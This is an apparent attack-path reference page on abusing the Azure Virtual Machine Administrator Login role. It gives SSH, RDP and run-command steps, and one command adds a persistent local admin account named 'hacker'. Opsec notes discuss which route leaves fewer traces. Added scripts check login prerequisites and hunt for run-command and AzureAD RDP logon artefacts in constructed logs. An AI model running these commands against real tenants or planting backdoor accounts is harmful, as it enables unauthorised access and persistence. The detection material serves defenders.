AZVMAdminLogin

The source principal holds the Virtual Machine Administrator Login role on the target VM. Through the VM's Entra ID (AAD) login extension, that role lets the principal sign in with local administrator rights on Windows or with sudo-to-root on Linux. The sibling Virtual Machine User Login role grants only an unprivileged session.

Applies to: User → AZVM


Linux Abuse

SSH to Linux VM with AAD authentication

# Client side: the az CLI ssh extension. Target side: the VM must carry the
# AADSSHLoginForLinux extension (see Opsec).
az extension add --name ssh

# Sign in as the source principal. For a service principal:
az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>

# AAD login: az ssh vm obtains a short-lived SSH certificate for the signed-in
# principal and connects as that principal. sudo -i then works because the
# edge is the Administrator (not the User) Login role.
az ssh vm -g <resource-group> -n <vm-name>

# Only if you also hold a local account on the box: --local-user switches
# az ssh vm to ordinary key/password authentication and does not use AAD.
az ssh vm \
  --resource-group <resource-group> \
  --name <vm-name> \
  --local-user <username>

Get VM public IP and SSH directly after adding SSH key

# az vm user update drives the VMAccess extension and therefore needs
# Microsoft.Compute/virtualMachines/extensions/write (VM Contributor or
# Contributor). The Virtual Machine Administrator Login role does not grant it,
# so this is a fallback for when you also hold that permission.
az vm user update \
  --resource-group <resource-group> \
  --name <vm-name> \
  --username <username> \
  --ssh-key-value "$(cat ~/.ssh/id_rsa.pub)"

# Get IP (requires the public IP read permission the role does include)
az vm show -d -g <resource-group> -n <vm-name> --query publicIps -o tsv

# SSH
ssh <username>@<vm-public-ip>

Run command on VM without interactive login

# Run Command needs Microsoft.Compute/virtualMachines/runCommand/action, which
# is also not part of Virtual Machine Administrator Login. Where you do hold it,
# the script runs as root (Linux) or SYSTEM (Windows) through the guest agent
# and needs no AAD login extension on the VM.
az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunShellScript \
  --scripts "id; cat /root/root.txt"

# Windows VM
az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunPowerShellScript \
  --scripts "whoami; type C:\Users\Administrator\Desktop\root.txt"

Windows Abuse

RDP with AAD credentials

# Standard RDP: log in with the source principal's UPN under the AzureAD
# pseudo-domain. Requires the AADLoginForWindows extension on the VM.
mstsc /v:<vm-public-ip>
# Username: AzureAD\<upn>
# Password: <password>
# From a client that is not itself Entra-joined, AAD credentials cannot pass
# through NLA/CredSSP: connect from a saved .rdp file that sets
# enablecredsspsupport:i:0 and authentication level:i:2 instead of using /v:.
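A pre-flight that ties the Linux and Windows login paths above together, added here as an example and not part of the original page. Offline it runs over constructed samples; with `--live <rg> <vm>` it queries the az CLI as the currently signed-in principal, which it assumes is the edge's source principal. The resource names (rg, web01, 203.0.113.10, alice@contoso.com) and the JSON samples are constructed; the extension and role names are the real ones.

```sh
#!/bin/sh
# Added example (not from the original page): pre-flight for the AAD login
# paths. Checks that the Administrator Login role is actually assigned, which
# Entra login extension the VM carries, and emits the matching client step.
set -eu

# Entra login extensions, both published by Microsoft.Azure.ActiveDirectory.
LINUX_EXT="AADSSHLoginForLinux"
WINDOWS_EXT="AADLoginForWindows"

# Constructed stand-in for `az vm extension list -o json` on a Linux VM.
SAMPLE_EXTENSIONS='[{"name": "AADSSHLoginForLinux", "publisher": "Microsoft.Azure.ActiveDirectory", "provisioningState": "Succeeded"}]'
# Constructed stand-in for `az role assignment list --assignee <me> --scope <vm-id> --include-inherited -o json`.
SAMPLE_ROLES='[{"roleDefinitionName": "Virtual Machine Administrator Login", "principalName": "alice@contoso.com", "scope": "/subscriptions/s1/resourceGroups/rg/providers/Microsoft.Compute/virtualMachines/web01"}]'

# aad_login_kind EXT_JSON: prints linux, windows or none by which extension is present.
aad_login_kind() {
  if   printf '%s' "$1" | grep -q "\"$LINUX_EXT\"";   then echo linux
  elif printf '%s' "$1" | grep -q "\"$WINDOWS_EXT\""; then echo windows
  else echo none
  fi
}

# has_admin_login ROLES_JSON: succeeds if the Administrator (not User) Login role is assigned.
has_admin_login() {
  printf '%s' "$1" | grep -q '"roleDefinitionName": *"Virtual Machine Administrator Login"'
}

# write_rdp_file HOST OUTFILE: from a client that is not itself Entra-joined,
# AAD credentials cannot pass through NLA/CredSSP, so the .rdp file turns
# CredSSP off and sets authentication level 2; log in as AzureAD\<upn>.
write_rdp_file() {
  printf 'full address:s:%s:3389\nenablecredsspsupport:i:0\nauthentication level:i:2\nprompt for credentials:i:1\n' "$1" > "$2"
}

# plan_login KIND RG VM IP OUTDIR: prints the client-side step for KIND.
plan_login() {
  case "$1" in
    linux)   printf '%s\n' "az ssh vm -g $2 -n $3" ;;
    windows) write_rdp_file "$4" "$5/$3.rdp"
             printf '%s\n' "mstsc $5/$3.rdp   (username: AzureAD\\<upn>)" ;;
    *)       printf '%s\n' "no Entra login extension on $3: VM Administrator Login cannot be used" ;;
  esac
}

if [ "${1:-}" = "--live" ]; then
  rg="$2"; vm="$3"
  me="$(az account show --query user.name -o tsv)"
  vm_id="$(az vm show -g "$rg" -n "$vm" --query id -o tsv)"
  exts="$(az vm extension list -g "$rg" -n "$vm" -o json)"
  roles="$(az role assignment list --assignee "$me" --scope "$vm_id" --include-inherited -o json)"
  ip="$(az vm show -d -g "$rg" -n "$vm" --query publicIps -o tsv)"
else
  rg=rg; vm=web01; exts="$SAMPLE_EXTENSIONS"; roles="$SAMPLE_ROLES"; ip=203.0.113.10
fi

has_admin_login "$roles" || { echo "no Virtual Machine Administrator Login assignment on this VM" >&2; exit 1; }
plan_login "$(aad_login_kind "$exts")" "$rg" "$vm" "$ip" "${TMPDIR:-/tmp}"
```

The role check uses `--include-inherited` because the assignment that creates this edge is often made at resource-group or subscription scope rather than on the VM itself. The extension check is what separates "role assigned" from "role usable": without AADSSHLoginForLinux or AADLoginForWindows there is nothing on the VM to honour the token.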

Az PowerShell: run command as SYSTEM

# Needs Microsoft.Compute/virtualMachines/runCommand/action (VM Contributor or
# Contributor); the Virtual Machine Administrator Login role alone does not
# include it. The script runs as NT AUTHORITY\SYSTEM through the guest agent.
Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Invoke-AzVMRunCommand `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -CommandId RunPowerShellScript `
  -ScriptString "whoami; hostname; ipconfig"

Add local admin account via run-command

# Same prerequisite as above. The local account persists even if the AAD role
# assignment is later removed.
Invoke-AzVMRunCommand `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -CommandId RunPowerShellScript `
  -ScriptString 'net user hacker P@ssw0rd123! /add; net localgroup administrators hacker /add'

Opsec

  • Every AAD-backed login, SSH or RDP, is recorded in the Entra ID sign-in logs under the source principal, against the applications "Azure Linux VM Sign-In" / "Azure Windows VM Sign-In".
  • RDP login generates Event ID 4624 (logon type 10, RemoteInteractive) on the target VM; an AAD account shows the AzureAD account domain rather than the machine name. AAD SSH logins are logged by sshd in the VM's auth log / journal as usual.
  • az vm run-command and Invoke-AzVMRunCommand write a Microsoft.Compute/virtualMachines/runCommand/action entry to the Azure Activity Log with the caller's identity, and leave the script and its output on disk: C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\ on Windows, /var/lib/waagent/run-command/download/ on Linux.
  • AAD-based login only works if the VM carries the AADSSHLoginForLinux or AADLoginForWindows extension (check with az vm extension list); without it the role is assigned but unusable.
  • RDP into a session that is already in use disconnects the logged-on user, which generates a visible disconnect event.
  • Prefer run-command over interactive RDP/SSH when you only need code execution and hold the runCommand permission: it leaves no interactive-session artefacts on the host, at the cost of a conspicuous Activity Log entry. Where this edge is all you have, the AAD login path is the only option and produces both host logon events and an Entra sign-in entry.
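The detection side of the Opsec notes, as an added example that is not part of the original page: the two filters below pick run-command invocations out of Activity Log records and AAD-backed RDP logons out of Windows Security events. The records are constructed; the Activity Log ones are trimmed to the real `operationName`, `caller` and `resourceId` properties, and the Windows events are flattened to a constructed CSV of EventID, LogonType, Domain\Account and source IP, which is not the native event format.

```sh
#!/bin/sh
# Added example (not from the original page): hunt for the two artefact classes
# the Opsec notes describe, over constructed sample records.
set -eu

# Constructed Azure Activity Log export, one trimmed JSON record per line.
ACTIVITY_LOG='{"operationName": "Microsoft.Compute/virtualMachines/runCommand/action", "caller": "svc-deploy@contoso.com", "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01", "status": "Succeeded"}
{"operationName": "Microsoft.Compute/virtualMachines/start/action", "caller": "ops@contoso.com", "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/web01", "status": "Succeeded"}
{"operationName": "Microsoft.Compute/virtualMachines/runCommand/action", "caller": "alice@contoso.com", "resourceId": "/subscriptions/s1/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/db01", "status": "Succeeded"}'

# Constructed Windows Security events as CSV: EventID,LogonType,Domain\Account,SourceIP.
SECURITY_EVENTS='4624,10,AzureAD\alice@contoso.com,203.0.113.7
4624,3,AzureAD\alice@contoso.com,10.0.0.4
4624,10,WEB01\localadmin,203.0.113.9
4625,10,AzureAD\bob@contoso.com,203.0.113.7'

# run_command_callers: "<caller> <vm>" for each runCommand/action record, the
# control-plane trace every az vm run-command / Invoke-AzVMRunCommand leaves.
# Case-insensitive because some exports upper-case the operation name.
run_command_callers() {
  printf '%s\n' "$ACTIVITY_LOG" |
    grep -i 'virtualMachines/runCommand/action' |
    sed -E 's|.*"caller": *"([^"]+)".*virtualMachines/([^"/]+)".*|\1 \2|'
}

# aad_rdp_logons: successful RemoteInteractive logons (4624, type 10) by
# Entra-backed accounts, which appear on the host under the AzureAD domain.
# Network logons (type 3) and failures (4625) are left out on purpose.
aad_rdp_logons() {
  printf '%s\n' "$SECURITY_EVENTS" |
    awk -F',' '$1 == 4624 && $2 == 10 && index($3, "AzureAD\\") == 1 { print $3, $4 }'
}

echo "run-command invocations (caller vm):"
run_command_callers
echo "AAD RDP logons (account source-ip):"
aad_rdp_logons
```

Joining the two views is the useful part: a runCommand/action caller who never appears in the sign-in logs as a VM login is using Contributor-level rights rather than this edge, while an AzureAD-domain type-10 logon with no matching Entra sign-in entry is worth a closer look.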